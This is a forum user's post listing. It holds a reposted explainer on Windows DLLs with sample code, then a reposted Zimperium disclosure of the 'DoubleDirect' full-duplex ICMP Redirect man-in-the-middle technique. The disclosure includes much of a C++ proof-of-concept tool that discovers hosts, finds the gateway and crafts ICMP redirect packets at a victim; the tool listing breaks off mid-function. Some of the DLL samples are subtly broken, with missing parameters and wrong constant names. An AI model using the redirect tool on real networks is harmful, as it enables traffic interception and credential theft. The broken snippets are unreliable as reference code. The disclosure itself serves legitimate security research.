-
Posts
5 -
Joined
-
Last visited
Everything posted by monstr
-
Dynamic-link library, or DLL, is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems. These libraries usually have the file extension DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers). The file formats for DLLs are the same as for Windows EXE files – that is, Portable Executable (PE) for 32-bit and 64-bit Windows, and New Executable (NE) for 16-bit Windows. As with EXEs, DLLs can contain code, data, and resources, in any combination. Data files with the same file format as a DLL, but with different file extensions and possibly containing only resource sections, can be called resource DLLs. Examples of such DLLs include icon libraries, sometimes having the extension ICL, and font files, having the extensions FON and FOT. Background The first versions of Microsoft Windows ran programs together in a single address space. Every program was meant to co-operate by yielding the CPU to other programs so that the graphical user interface (GUI) could multitask and be maximally responsive. All operating system level operations were provided by the underlying operating system: MS-DOS. All higher level services were provided by Windows Libraries "Dynamic Link Library." The Drawing API, GDI, was implemented in a DLL called GDI.EXE, the user interface in USER.EXE. These extra layers on top of DOS had to be shared across all running Windows programs, not just to enable Windows to work in a machine with less than a megabyte of RAM, but to enable the programs to co-operate among each other. The Graphics Device Interface code in GDI needed to translate drawing commands to operations on specific devices. On the display, it had to manipulate pixels in the frame buffer. When drawing to a printer, the API calls had to be transformed into requests to a printer. Although it could have been possible to provide hard-coded support for a limited set of devices (like the Color Graphics Adapter display, the HP LaserJet Printer Command Language), Microsoft chose a different approach. GDI would work by loading different pieces of code, called 'device drivers', to work with different output devices. The same architectural concept that allowed GDI to load different device drivers is that which allowed the Windows shell to load different Windows programs, and for these programs to invoke API calls from the shared USER and GDI libraries. That concept was "dynamic linking." In a conventional non-shared "static" library, sections of code are simply added to the calling program when its executable is built at the "linking" phase; if two programs call the same routine, the routine is included in both the programs during the linking stage of the two. With dynamic linking, shared code is placed into a single, separate file. The programs that call this file are connected to it at run time, with the operating system (or, in the case of early versions of Windows, the OS-extension), performing the binding. For those early versions of Windows (1.0 to 3.11), the DLLs were the foundation for the entire GUI. Display drivers were merely DLLs with a .DRV extension that provided custom implementations of the same drawing API through a unified device driver interface (DDI). The Drawing (GDI) and GUI (USER) APIs were merely the function calls exported by the GDI and USER, system DLLs with .EXE extension. This notion of building up the operating system from a collection of dynamically loaded libraries is a core concept of Windows that persists even today. DLLs provide the standard benefits of shared libraries, such as modularity. Modularity allows changes to be made to code and data in a single self-contained DLL shared by several applications without any change to the applications themselves. Another benefit of the modularity is the use of generic interfaces for plug-ins. A single interface may be developed which allows old as well as new modules to be integrated seamlessly at run-time into pre-existing applications, without any modification to the application itself. This concept of dynamic extensibility is taken to the extreme with the Component Object Model, the underpinnings of ActiveX. In Windows 1.x, 2.x and 3.x, all Windows applications shared the same address space as well as the same memory. A DLL was only loaded once into this address space; from then on, all programs using the library accessed it. The library's data was shared across all the programs. This could be used as an indirect form of inter-process communication, or it could accidentally corrupt the different programs. With the introduction of 32-bit libraries in Windows 95 every process runs in its own address space. While the DLL code may be shared, the data is private except where shared data is explicitly requested by the library. That said, large swathes of Windows 95, Windows 98 and Windows Me were built from 16-bit libraries, which limited the performance of the Pentium Pro microprocessor when launched, and ultimately limited the stability and scalability of the DOS-based versions of Windows. Although DLLs are the core of the Windows architecture, they have several drawbacks, collectively called "DLL hell". Microsoft currently promotes .NET Framework as one solution to the problems of DLL hell, although they now promote virtualization-based solutions such as Microsoft Virtual PC and Microsoft Application Virtualization, because they offer superior isolation between applications. An alternative mitigating solution to DLL hell has been implementing side-by-side assembly. Features of dll Since DLLs are essentially the same as EXEs, the choice of which to produce as part of the linking process is for clarity, since it is possible to export functions and data from either. It is not possible to directly execute a DLL, since it requires an EXE for the operating system to load it through an entry point, hence the existence of utilities like RUNDLL.EXE or RUNDLL32.EXE which provide the entry point and minimal framework for DLLs that contain enough functionality to execute without much support. DLLs provide a mechanism for shared code and data, allowing a developer of shared code/data to upgrade functionality without requiring applications to be re-linked or re-compiled. From the application development point of view Windows and OS/2 can be thought of as a collection of DLLs that are upgraded, allowing applications for one version of the OS to work in a later one, provided that the OS vendor has ensured that the interfaces and functionality are compatible. DLLs execute in the memory space of the calling process and with the same access permissions which means there is little overhead in their use but also that there is no protection for the calling EXE if the DLL has any sort of bug. Memory Managemet In Windows API, the DLL files are organized into sections. Each section has its own set of attributes, such as being writable or read-only, executable (for code) or non-executable (for data), and so on. The code in a DLL is usually shared among all the processes that use the DLL; that is, they occupy a single place in physical memory, and do not take up space in the page file. If the physical memory occupied by a code section is to be reclaimed, its contents are discarded, and later reloaded directly from the DLL file as necessary. In contrast to code sections, the data sections of a DLL are usually private; that is, each process using the DLL has its own copy of all the DLL's data. Optionally, data sections can be made shared, allowing inter-process communication via this shared memory area. However, because user restrictions do not apply to the use of shared DLL memory, this creates a security hole; namely, one process can corrupt the shared data, which will likely cause all other sharing processes to behave undesirably. For example, a process running under a guest account can in this way corrupt another process running under a privileged account. This is an important reason to avoid the use of shared sections in DLLs. If a DLL is compressed by certain executable packers (e.g. UPX), all of its code sections are marked as read and write, and will be unshared. Read-and-write code sections, much like private data sections, are private to each process. Thus DLLs with shared data sections should not be compressed if they are intended to be used simultaneously by multiple programs, since each program instance would have to carry its own copy of the DLL, resulting in increased memory consumption. Import Libraries Like static libraries, import libraries for DLLs are noted by the .lib file extension. For example, kernel32.dll, the primary dynamic library for Windows' base functions such as file creation and memory management, is linked via kernel32.lib. Linking to dynamic libraries is usually handled by linking to an import library when building or linking to create an executable file. The created executable then contains an import address table (IAT) by which all DLL function calls are referenced (each referenced DLL function contains its own entry in the IAT). At run-time, the IAT is filled with appropriate addresses that point directly to a function in the separately loaded DLL. Symbol resolution and binding Each function exported by a DLL is identified by a numeric ordinal and optionally a name. Likewise, functions can be imported from a DLL either by ordinal or by name. The ordinal represents the position of the function's address pointer in the DLL Export Address table. It is common for internal functions to be exported by ordinal only. For most Windows API functions only the names are preserved across different Windows releases; the ordinals are subject to change. Thus, one cannot reliably import Windows API functions by their ordinals. Importing functions by ordinal provides only slightly better performance than importing them by name: export tables of DLLs are ordered by name, so a binary search can be used to find a function. The index of the found name is then used to look up the ordinal in the Export Ordinal table. In 16-bit Windows, the name table was not sorted, so the name lookup overhead was much more noticeable. It is also possible to bind an executable to a specific version of a DLL, that is, to resolve the addresses of imported functions at compile-time. For bound imports, the linker saves the timestamp and checksum of the DLL to which the import is bound. At run-time Windows checks to see if the same version of library is being used, and if so, Windows bypasses processing the imports. Otherwise, if the library is different from the one which was bound to, Windows processes the imports in a normal way. Bound executables load somewhat faster if they are run in the same environment that they were compiled for, and exactly the same time if they are run in a different environment, so there's no drawback for binding the imports. For example, all the standard Windows applications are bound to the system DLLs of their respective Windows release. A good opportunity to bind an application's imports to its target environment is during the application's installation. This keeps the libraries 'bound' until the next OS update. It does, however, change the checksum of the executable, so it is not something that can be done with signed programs, or programs that are managed by a configuration management tool that uses checksums (such as MD5 checksums) to manage file versions. As more recent Windows versions have moved away from having fixed addresses for every loaded library (for security reasons), the opportunity and value of binding an executable is decreasing. Explicit run-time linking DLL files may be explicitly loaded at run-time, a process referred to simply as run-time dynamic linking by Microsoft, by using the LoadLibrary (or LoadLibraryEx) API function. The GetProcAddress API function is used to look up exported symbols by name, and FreeLibrary – to unload the DLL. These functions are analogous to dlopen, dlsym, and dlclose in the POSIX standard API. /* LSPaper draw using OLE2 function if available on client */ HINSTANCE ole; ole = LoadLibrary("OLE2.DLL"); if (ole != NULL) { FARPROC oledraw = GetProcAddress(ole, "OleDraw"); if (oledraw != NULL) (*oledraw)(pUnknown, dwAspect, hdcDraw, lprcBounds); FreeLibrary(ole); } The procedure for explicit run-time linking is the same in any language that supports pointers to functions, since it depends on the Windows API rather than language constructs. Delayed loading Normally, an application that was linked against a DLL’s import library will fail to start if the DLL cannot be found, because Windows will not run the application unless it can find all of the DLLs that the application may need. However an application may be linked against an import library to allow delayed loading of the dynamic library.[3] In this case the operating system will not try to find or load the DLL when the application starts; instead, a stub is included in the application by the linker which will try to find and load the DLL through LoadLibrary and GetProcAddress when one of its functions is called. If the DLL cannot be found or loaded, or the called function does not exist, the application will generate an exception, which may be caught and handled appropriately. If the application does not handle the exception, it will be caught by the operating system, which will terminate the program with an error message. The delay-loading mechanism also provides notification hooks, allowing the application to perform additional processing or error handling when the DLL is loaded and/or any DLL function is called. Compiler and language considerations Delphi In the heading of a source file, the keyword library is used instead of program. At the end of the file, the functions to be exported are listed in exports clause. Delphi does not need LIB files to import functions from DLLs; to link to a DLL, the external keyword is used in the function declaration to signal the DLL name, followed by name to name the symbol (if different) or index to identify the index. Microsoft Visual Basic In Visual Basic (VB), only run-time linking is supported; but in addition to using LoadLibrary and GetProcAddress API functions, declarations of imported functions are allowed. When importing DLL functions through declarations, VB will generate a run-time error if the DLL file cannot be found. The developer can catch the error and handle it appropriately. When creating DLLs in VB, the IDE will only allow you to create ActiveX DLLs, however methods have been created to allow the user to explicitly tell the linker to include a .DEF file which defines the ordinal position and name of each exported function. This allows the user to create a standard Windows DLL using Visual Basic (Version 6 or lower) which can be referenced through a "Declare" statement. C and C++ Microsoft Visual C++ (MSVC) provides several extensions to standard C++ which allow functions to be specified as imported or exported directly in the C++ code; these have been adopted by other Windows C and C++ compilers, including Windows versions of GCC. These extensions use the attribute __declspec before a function declaration. Note that when C functions are accessed from C++, they must also be declared as extern "C" in C++ code, to inform the compiler that the C linkage should be used. Besides specifying imported or exported functions using __declspec attributes, they may be listed in IMPORT or EXPORTS section of the DEF file used by the project. The DEF file is processed by the linker, rather than the compiler, and thus it is not specific to C++. DLL compilation will produce both DLL and LIB files. The LIB file is used to link against a DLL at compile-time; it is not necessary for run-time linking. Unless your DLL is a Component Object Model (COM) server, the DLL file must be placed in one of the directories listed in the PATH environment variable, in the default system directory, or in the same directory as the program using it. COM server DLLs are registered using regsvr32.exe, which places the DLL's location and its globally unique ID (GUID) in the registry. Programs can then use the DLL by looking up its GUID in the registry to find its location. Creating DLL exports The following examples show language-specific bindings for exporting symbols from DLLs. Delphi library Example; // function that adds two numbers function AddNumbers(a, b : Double): Double; cdecl; begin Result := a + b; end; // export this function exports AddNumbers; // DLL initialization code: no special handling needed begin end. C #include <windows.h> // DLL entry function (called on load, unload, ...) BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, LPVOID lpReserved) { return TRUE; } // Exported function - adds two numbers extern "C" __declspec(dllexport) double AddNumbers(double a, double { return a + b; } Using DLL imports The following examples show how to use language-specific bindings to import symbols for linking against a DLL at compile-time. Delphi {$APPTYPE CONSOLE} program Example; // import function that adds two numbers function AddNumbers(a, b : Double): Double; cdecl; external 'Example.dll'; // main program var R: Double; begin R := AddNumbers(1, 2); Writeln('The result was: ', R); end. C Make sure you include Example.lib file (assuming that Example.dll is generated) in the project (Add Existing Item option for Project!) before static linking. The file Example.lib is automatically generated by the compiler when compiling the DLL. Not executing the above statement would cause linking error as the linker would not know where to find the definition of AddNumbers. You also need to copy the DLL Example.dll to the location where the .exe file would be generated by the following code. #include <windows.h> #include <stdio.h> // Import function that adds two numbers extern "C" __declspec(dllimport) double AddNumbers(double a, double ; int main(int argc, char *argv[]) { double result = AddNumbers(1, 2); printf("The result was: %f\n", result); return 0; } Using explicit run-time linking The following examples show how to use the run-time loading and linking facilities using language-specific Windows API bindings. Microsoft Visual Basic Option Explicit Declare Function AddNumbers Lib "Example.dll" _ (ByVal a As Double, ByVal b As Double) As Double Sub Main() Dim Result As Double Result = AddNumbers(1, 2) Debug.Print "The result was: " & Result End Sub Delphi program Example; {$APPTYPE CONSOLE} uses Windows; var AddNumbers:function (a, b: integer): Double; cdecl; LibHandle:HMODULE; begin LibHandle := LoadLibrary('example.dll'); if LibHandle <> 0 then AddNumbers := GetProcAddress(LibHandle, 'AddNumbers'); if Assigned(AddNumbers) then Writeln( '1 + 2 = ', AddNumbers( 1, 2 ) ); Readln; end. C #include <windows.h> #include <stdio.h> // DLL function signature typedef double (*importFunction)(double, double); int main(int argc, char **argv) { importFunction addNumbers; double result; HINSTANCE hinstLib; // Load DLL file hinstLib = LoadLibrary(TEXT("Example.dll")); if (hinstLib == NULL) { printf("ERROR: unable to load DLL\n"); return 1; } // Get function pointer addNumbers = (importFunction) GetProcAddress(hinstLib, "AddNumbers"); if (addNumbers == NULL) { printf("ERROR: unable to find DLL function\n"); FreeLibrary(hinstLib); return 1; } // Call function. result = addNumbers(1, 2); // Unload DLL file FreeLibrary(hinstLib); // Display result printf("The result was: %f\n", result); return 0; } Python import ctypes my_dll = ctypes.cdll.LoadLibrary("Example.dll") # The following "restype" method specification is needed to make # Python understand what type is returned by the function. my_dll.AddNumbers.restype = ctypes.c_double p = my_dll.AddNumbers(ctypes.c_double(1.0), ctypes.c_double(2.0)) print "The result was:", p Source Dll Development This section describes the issues and the requirements that you should consider when you develop your own DLLs. Types of DLLs When you load a DLL in an application, two methods of linking let you call the exported DLL functions. The two methods of linking are load-time dynamic linking and run-time dynamic linking. Load-time dynamic linking In load-time dynamic linking, an application makes explicit calls to exported DLL functions like local functions. To use load-time dynamic linking, provide a header (.h) file and an import library (.lib) file when you compile and link the application. When you do this, the linker will provide the system with the information that is required to load the DLL and resolve the exported DLL function locations at load time. Run-time dynamic linking In run-time dynamic linking, an application calls either the LoadLibrary function or the LoadLibraryEx function to load the DLL at run time. After the DLL is successfully loaded, you use the GetProcAddress function to obtain the address of the exported DLL function that you want to call. When you use run-time dynamic linking, you do not need an import library file. The following list describes the application criteria for when to use load-time dynamic linking and when to use run-time dynamic linking: Startup performance If the initial startup performance of the application is important, you should use run-time dynamic linking. Ease of use In load-time dynamic linking, the exported DLL functions are like local functions. This makes it easy for you to call these functions. Application logic In run-time dynamic linking, an application can branch to load different modules as required. This is important when you develop multiple-language versions. The DLL entry point When you create a DLL, you can optionally specify an entry point function. The entry point function is called when processes or threads attach themselves to the DLL or detached themselves from the DLL. You can use the entry point function to initialize data structures or to destroy data structures as required by the DLL. Additionally, if the application is multithreaded, you can use thread local storage (TLS) to allocate memory that is private to each thread in the entry point function. The following code is an example of the DLL entry point function. BOOL APIENTRY DllMain( HANDLE hModule, // Handle to DLL module DWORD ul_reason_for_call, // Reason for calling function LPVOID lpReserved ) // Reserved { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACHED: // A process is loading the DLL. break; case DLL_THREAD_ATTACHED: // A process is creating a new thread. break; case DLL_THREAD_DETACH: // A thread exits normally. break; case DLL_PROCESS_DETACH: // A process unloads the DLL. break; } return TRUE; } When the entry point function returns a FALSE value, the application will not start if you are using load-time dynamic linking. If you are using run-time dynamic linking, only the individual DLL will not load. The entry point function should only perform simple initialization tasks and should not call any other DLL loading or termination functions. For example, in the entry point function, you should not directly or indirectly call the LoadLibrary function or the LoadLibraryEx function. Additionally, you should not call the FreeLibrary function when the process is terminating. Note In multithreaded applications, make sure that access to the DLL global data is synchronized (thread safe) to avoid possible data corruption. To do this, use TLS to provide unique data for each thread. Exporting DLL functions To export DLL functions, you can either add a function keyword to the exported DLL functions or create a module definition (.def) file that lists the exported DLL functions. To use a function keyword, you must declare each function that you want to export with the following keyword: __declspec(dllexport) To use exported DLL functions in the application, you must declare each function that you want to import with the following keyword: __declspec(dllimport) Typically, you would use one header file that has a define statement and an ifdef statement to separate the export statement and the import statement. You can also use a module definition file to declare exported DLL functions. When you use a module definition file, you do not have to add the function keyword to the exported DLL functions. In the module definition file, you declare the LIBRARY statement and theEXPORTS statement for the DLL. The following code is an example of a definition file. // SampleDLL.def // LIBRARY "sampleDLL" EXPORTS HelloWorld Sample DLL and application In Microsoft Visual C++ 6.0, you can create a DLL by selecting either the Win32 Dynamic-Link Library project type or the MFC AppWizard (dll)project type. The following code is an example of a DLL that was created in Visual C++ by using the Win32 Dynamic-Link Library project type. // SampleDLL.cpp // #include "stdafx.h" #define EXPORTING_DLL #include "sampleDLL.h" BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { return TRUE; } void HelloWorld() { MessageBox( NULL, TEXT("Hello World"), TEXT("In a DLL"), MB_OK); } // File: SampleDLL.h // #ifndef INDLL_H #define INDLL_H #ifdef EXPORTING_DLL extern __declspec(dllexport) void HelloWorld() ; #else extern __declspec(dllimport) void HelloWorld() ; #endif #endif The following code is an example of a Win32 Application project that calls the exported DLL function in the SampleDLL DLL. // SampleApp.cpp // #include "stdafx.h" #include "sampleDLL.h" int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { HelloWorld(); return 0; } Note In load-time dynamic linking, you must link the SampleDLL.lib import library that is created when you build the SampleDLL project. In run-time dynamic linking, you use code that is similar to the following code to call the SampleDLL.dll exported DLL function. ... typedef VOID (*DLLPROC) (LPTSTR); ... HINSTANCE hinstDLL; DLLPROC HelloWorld; BOOL fFreeDLL; hinstDLL = LoadLibrary("sampleDLL.dll"); if (hinstDLL != NULL) { HelloWorld = (DLLPROC) GetProcAddress(hinstDLL, "HelloWorld"); if (HelloWorld != NULL) (HelloWorld); fFreeDLL = FreeLibrary(hinstDLL); } ... When you compile and link the SampleDLL application, the Windows operating system searches for the SampleDLL DLL in the following locations in this order: The application folder The current folder The Windows system folder Note The GetSystemDirectory function returns the path of the Windows system folder. The Windows folder Note The GetWindowsDirectory function returns the path of the Windows folder. The .NET Framework assembly With the introduction of Microsoft .NET and the .NET Framework, most of the problems that are associated with DLLs have been eliminated by using assemblies. An assembly is a logical unit of functionality that runs under the control of the .NET common language runtime (CLR). An assembly physically exists as a .dll file or as an .exe file. However, internally an assembly is very different from a Microsoft Win32 DLL. An assembly file contains an assembly manifest, type metadata, Microsoft intermediate language (MSIL) code, and other resources. The assembly manifest contains the assembly metadata that provides all the information that is required for an assembly to be self-describing. The following information is included in the assembly manifest: Assembly name Version information Culture information Strong name information The assembly list of files Type reference information Referenced and dependent assembly information The MSIL code that is contained in the assembly cannot be directly executed. Instead, MSIL code execution is managed through the CLR. By default, when you create an assembly, the assembly is private to the application. To create a shared assembly requires that you assign a strong name to the assembly and then publish the assembly in the global assembly cache. The following list describes some of the features of assemblies compared to the features of Win32 DLLs: Self-describing When you create an assembly, all the information that is required for the CLR to run the assembly is contained in the assembly manifest. The assembly manifest contains a list of the dependent assemblies. Therefore, the CLR can maintain a consistent set of assemblies that are used in the application. In Win32 DLLs, you cannot maintain consistency between a set of DLLs that are used in an application when you use shared DLLs. Versioning In an assembly manifest, version information is recorded and enforced by the CLR. Additionally, version policies let you enforce version-specific usage. In Win32 DLLs, versioning cannot be enforced by the operating system. Instead, you must make sure that DLLs are backward compatible. Side-by-side deployment Assemblies support side-by-side deployment. One application can use one version of an assembly, and another application can use a different version of an assembly. Starting in Windows 2000, side-by-side deployment is supported by locating DLLs in the application folder. Additionally, Windows File Protection prevents system DLLs from being overwritten or replaced by an unauthorized agent. Self-containment and isolation An application that is developed by using an assembly can be self-contained and isolated from other applications that are running on the computer. This feature helps you create zero-impact installations. Execution An assembly is run under the security permissions that are supplied in the assembly manifest and that are controlled by the CLR. Language independent An assembly can be developed by using any one of the supported .NET languages. For example, you can develop an assembly in Microsoft Visual C#, and then use the assembly in a Microsoft Visual Basic .NET project. Source
-
- 1
-
Zimperium Mobile Security Labs have investigated during the last year a new type of attack technique in the wild being exploited by attackers. Aptly named “DoubleDirect,” this attack technique is a type of “Man-in-the-Middle” attack (MITM) enabling an attacker to redirect a victim’s traffic to the attacker’s device. Once redirected, the attacker can steal credentials and deliver malicious payloads to the victim’s mobile device that can not only quickly infect the device, but also spread throughout a corporate network. We have identified that the traffic of the following services were redirected during the attacks on victim’s devices: Google, Facebook, Twitter, Hotmail, Live.com, Naver.com (Korean) and others. Since the attack is happening on the IPs that the user access – it does not necessarily mean that the attacker had visibility to encrypted traffic that some of the above services are enforcing. We identified attacks across 31 countries, outlined below: Serbia Australia Iraq Kazakhstan Poland Indonesia Israel Latvia Finland Mexico Egypt United Kingdom Austria Colombia Greece Brazil Canada France Algeria Russian Federation Switzerland Italy Germany Spain Saudi Arabia Netherlands India Malta Bahrain United States China The growth of mobile devices has led to a significant rise in network attacks on wireless networks. An “ICMP Redirect” attack is one example of a known MITM network attack, often used as an alternative to an ARP poisoning attack technique. Current implementations of ICMP Redirect with publically available tools like ettercap include half-duplex MITM – meaning that one side is poisoned using an ICMP Redirect (victim) and the router is poisoned using an old-school ARP Spoofing. With such an implementation – networks that are immune to ARP spoofing will be able to stop the attack. From Ettercap Manual Reference Pages[1]: “It sends a spoofed icmp redirect message to the hosts in the lan pretending to be a better route for internet. All connections to internet will be redirected to the attacker which, in turn, will forward them to the real gateway. The resulting attack is a HALF-DUPLEX mitm. Only the client is redirected, since the gateway will not accept redirect messages for a directly connected network.” So how does DoubleDirect work? DoubleDirect uses ICMP Redirect packets (type 5) to modify routing tables of a host. This is legitimately used by routers to notify the hosts on the network that a better route is available for a particular destination[2]. However, an attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic to flow via an arbitrary network path for a particular IP. As a result, the attacker can launch a MITM attack, redirecting the victim’s traffic to his device. Once redirected, the attacker can compromise the mobile device by chaining the attack with additional Client Side vulnerability (e.g: browser vulnerability), and in turn, provide an attacker with access to the corporate network. With the detection of DoubleDirect in the wild we understood that the attackers are using previously unknown implementation to achieve full-duplex MITMs using ICMP Redirect. Traditional ICMP Redirect attacks has limitations and known to be half-duplex MITM. Zimperium Mobile Security Labs researched the threats and determined that the attackers are able to predict the IPs being accessed by the victim. We have investigated the attacks and also created a POC tool to prove that it is possible to perform full-duplex ICMP Redirect attacks. ICMP Redirect attacks are not easy to emulate because the attacker must know beforehand which IP address the victim has accessed. (There isn’t a systematic way to forward all the traffic from the victim through the attacker.) How the attackers knew which IP addresses the victim has already accessed? To answer that question we should analyze the first thing a victim’s device does when we enter a URL into the browser. For example, when we type www.zimperium.com into any browser, the application sends a DNS request to find out the IP address of the www.zimperium.com host. As a first step, we can use ICMP Redirect packets to forward all the DNS traffic from the victim’s device to our machine. Most of the time we can predict which DNS server the victim is using. If it is in the same LAN, the DNS server is likely to be the same as ours obtained through DHCP. Some mobile devices uses some DNS servers by default (8.8.8.8 and / or 8.8.4.4). Once we have all the DNS traffic redirected and forwarded transparently through our device, we can send an ICMP redirect packet to every IP address we found on the sniffed DNS replies. The attackers are not only sniffing all the DNS traffic of the victim, but everything that is resolved through it. Finally, we present a simple and effective tool to perform audit for DoubleDirect: /* * DoubleDirect - Full-Duplex ICMP Redirect Auditing Tool - doubledirect_poc.cpp * Zimperium assumes no responsibility for any damage caused by using this software. * Permitted for educational or auditing purposes only. * Use at your own risk * * Author: larry */ #include <iostream> #include <fstream> #include <string> #include <map> #include <vector> #include <getopt.h> #include <pthread.h> #include <crafter.h> static void printUsage(const std::string& progname) { std::cout << "[#] Usage: " << progname << " [options] " << std::endl; std::cout << "[#] Options: " << std::endl; std::cout << " -i, --interface Interface" << std::endl; std::cout << " -g, --new-gateway New gateway for the poisoned destination" << std::endl; std::cout << " -s, --source Source IP address of the ICMP message" << std::endl; std::cout << " -v, --victim Victim IP address" << std::endl; } // Local interface info typedef struct { // Broadcast struct in_addr bcast; // Network Mask struct in_addr nmask; } ifcfg_t; // Grabs local network interface information and stores in a ifcfg_t // defined in network.h, returns 0 on success -1 on failure int get_local_info(const std::string& interface, ifcfg_t *ifcfg) { int rsock = socket(PF_INET, SOCK_DGRAM, 0); struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interface.c_str(), IF_NAMESIZE); if((ioctl(rsock, SIOCGIFBRDADDR, &ifr)) == -1){ perror("ioctl():"); return -1; } memcpy(&ifcfg->bcast, &(*(struct sockaddr_in *)&ifr.ifr_broadaddr).sin_addr, 4); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interface.c_str(), IF_NAMESIZE); if((ioctl(rsock, SIOCGIFNETMASK, &ifr)) == -1){ perror("ioctl():"); return -1; } memcpy(&ifcfg->nmask.s_addr, &(*(struct sockaddr_in *)&ifr.ifr_netmask).sin_addr, 4); close(rsock); return 0; } std::string get_string_ip(in_addr nip) { char str[INET_ADDRSTRLEN]; inet_ntop(AF_INET, &(nip.s_addr), str, INET_ADDRSTRLEN); return std::string(str); } std::string get_string_ip(in_addr_t nip) { char str[INET_ADDRSTRLEN]; inet_ntop(AF_INET, &nip, str, INET_ADDRSTRLEN); return std::string(str); } // Discover hosts on the local LAN std::map<std::string, std::string> arp_ping_discover(const std::vector<std::string>& hosts, const std::string& iface) { /* Get the IP address associated to the interface */ std::string MyIP = Crafter::GetMyIP(iface); /* Get the MAC Address associated to the interface */ std::string MyMAC = Crafter::GetMyMAC(iface); /* --------- Common data to all headers --------- */ Crafter::Ethernet ether_header; ether_header.SetSourceMAC(MyMAC); ether_header.SetDestinationMAC("ff:ff:ff:ff:ff:ff"); Crafter::ARP arp_header; arp_header.SetOperation(Crafter::ARP::Request); arp_header.SetSenderIP(MyIP); arp_header.SetSenderMAC(MyMAC); /* ---------------------------------------------- */ /* Create a container of packet pointers to hold all the ARP requests */ std::vector<Crafter::Packet*> request_packets; /* Iterate to access each string that defines an IP address */ for(size_t i = 0 ; i < hosts.size() ; ++i) { arp_header.SetTargetIP(hosts[i]); /* Create a packet on the heap */ Crafter::Packet* packet = new Crafter::Packet; /* Push the layers */ packet->PushLayer(ether_header); packet->PushLayer(arp_header); /* Finally, push the packet into the container */ request_packets.push_back(packet); } std::vector<Crafter::Packet*> replies_packets(request_packets.size()); SendRecv(request_packets.begin(), request_packets.end(), replies_packets.begin(), iface, 0.1, 4, 48); std::vector<Crafter::Packet*>::iterator it_pck; int counter = 0; std::map<std::string, std::string> pair_addr; for(it_pck = replies_packets.begin() ; it_pck < replies_packets.end() ; it_pck++) { Crafter::Packet* reply_packet = (*it_pck); /* Check if the pointer is not NULL */ if(reply_packet) { /* Get the ARP layer of the replied packet */ Crafter::ARP* arp_layer = reply_packet->GetLayer<Crafter::ARP>(); /* Print the Source IP */ std::cout << "[@] Host " << arp_layer->GetSenderIP() << " is up with " "MAC address " << arp_layer->GetSenderMAC() << std::endl; pair_addr.insert(std::make_pair(arp_layer->GetSenderIP(), arp_layer->GetSenderMAC())); counter++; } } std::cout << "[@] " << counter << " hosts up. " << std::endl; /* Delete the container with the ARP requests */ for(it_pck = request_packets.begin() ; it_pck < request_packets.end() ; it_pck++) delete (*it_pck); /* Delete the container with the responses */ for(it_pck = replies_packets.begin() ; it_pck < replies_packets.end() ; it_pck++) delete (*it_pck); return pair_addr; } // Get gateway MAC static std::string getGatewayMac(const std::string& iface) { // Set default values std::string gw_ip("0.0.0.0"), gw_mac("00:00:00:00:00:00"); char a[16]; char buf[1024]; uint32_t b, c, r; FILE *route_fd = fopen("/proc/net/route", "r"); if (route_fd == NULL) return gw_mac; fseek(route_fd, 0, 0); while (fgets(buf, sizeof(buf), route_fd)) { r = sscanf(buf, "%s %x %x", a, &b, &c); if ((r == 3) && (strcmp(a, iface.c_str()) == 0) && (b == 0)) { struct in_addr in; in.s_addr = c; gw_ip = std::string(inet_ntoa(in)); break; } } fclose(route_fd); std::string ip_addr_arp; std::string hw_addr_arp; std::string device_arp; std::string dummy; std::ifstream arp_table ("/proc/net/arp"); std::string line; std::getline (arp_table,line); typedef std::vector<std::pair<std::string, std::string> > addr_pair_cont; addr_pair_cont addr_pairs; if (arp_table.is_open()) { while ( arp_table.good() ) { arp_table >> ip_addr_arp; arp_table >> dummy; arp_table >> dummy; arp_table >> hw_addr_arp; arp_table >> dummy; arp_table >> device_arp; // Check if this entry is the gateway if(ip_addr_arp == gw_ip) { gw_mac = hw_addr_arp; break; } } } arp_table.close(); return gw_mac; } // Get gateway IP static std::string getGatewayIp(const std::string& iface) { std::string gw_addr(""); char a[16]; char buf[1024]; uint32_t b, c, r; FILE *route_fd = fopen("/proc/net/route", "r"); if (route_fd == NULL) return ""; fseek(route_fd, 0, 0); while (fgets(buf, sizeof(buf), route_fd)) { r = sscanf(buf, "%s %x %x", a, &b, &c); if ((r == 3) && (strcmp(a, iface.c_str()) == 0) && (b == 0)) { struct in_addr in; in.s_addr = c; gw_addr = std::string(inet_ntoa(in)); break; } } fclose(route_fd); return gw_addr; } // Structure to hold parameters of the ICMP redirect attack struct IcmpRedirParameters { // Interface std::string _interface; // Victim IP address std::string _victim; // Destination we want to poison std::string _destination; // Net gateway std::string _new_gateway; // Source of the ICMP redirect message std::string _source_ip; }; // Attack finished bool finish = false; // Global Sniffer pointer std::vector<Crafter::Sniffer*> sniffers; // List of poisoned entries (one for each destination) std::map<std::string, IcmpRedirParameters*> poisoned_entries; pthread_mutex_t entries_mutex; // Function for handling a CTRL-C void ctrl_c(int dummy) { // Signal finish of the attack finish = true; // Cancel the sniffing thread for(size_t i = 0 ; i < sniffers.size() ; ++i) { sniffers[i]->Cancel(); } } Crafter::Packet* createIcmpPacket(const IcmpRedirParameters* parameters) { // Create an IP header Crafter::IP ip_header; ip_header.SetSourceIP(parameters->_source_ip); ip_header.SetDestinationIP(parameters->_victim); // Create an ICMP header Crafter::ICMP icmp_header; // ICMP redirect message icmp_header.SetType(Crafter::ICMP::EchoRedirect); // Code for redirect to host icmp_header.SetCode(1); // Set gateway (put attacker's IP here) icmp_header.SetGateway(parameters->_new_gateway); // Original packet, this should contain the address we want to poison Crafter::IP orig_ip_header; orig_ip_header.SetSourceIP(parameters->_victim); orig_ip_header.SetDestinationIP(parameters->_destination); // Create an UDP header. This could be any protocol (ICMP, UDP, TCP, etc) Crafter::UDP orig_udp_header; orig_udp_header.SetDstPort(53); orig_udp_header.SetSrcPort(Crafter::RNG16()); // Craft the packet and sent it every 3 seconds Crafter::Packet* redir_packet = new Crafter::Packet(ip_header / icmp_header / orig_ip_header / orig_udp_header); // Return created packet return redir_packet; 